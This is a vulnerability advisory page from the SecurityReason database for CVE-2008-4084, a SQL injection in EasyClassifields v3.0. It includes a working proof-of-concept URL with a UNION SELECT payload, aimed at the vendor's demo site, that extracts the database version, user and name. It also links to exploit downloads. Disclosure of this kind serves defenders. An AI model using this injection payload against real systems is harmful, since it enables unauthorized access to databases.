|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4254 CVE : CVE-2008-4084 CWE : CWE-89 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : No Credit : e.wiZz! Published : 17.09.2008
Advisory Content : ##############EasyClassifields v3.0 SQL Injection####################### ####By: e.wiZz! ####Info: Bosnian Idiot FTW! ####Site: infected.blogger.ba ####Greetz: Luigi,suN8Hclf,str0ke In the wild... ################################################################## ###Script Site: http://myiosoft.com/?1.6.0.0 ###Vulnerability: http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql> PoC on demo site: http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifi elds/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20con cat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user References : http://securityreason.com/expldownload/1/4574/1 (Exploit) http://www.securityfocus.com/bid/30943
http://www.milw0rm.com/exploits/6342
http://secunia.com/advisories/31682  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |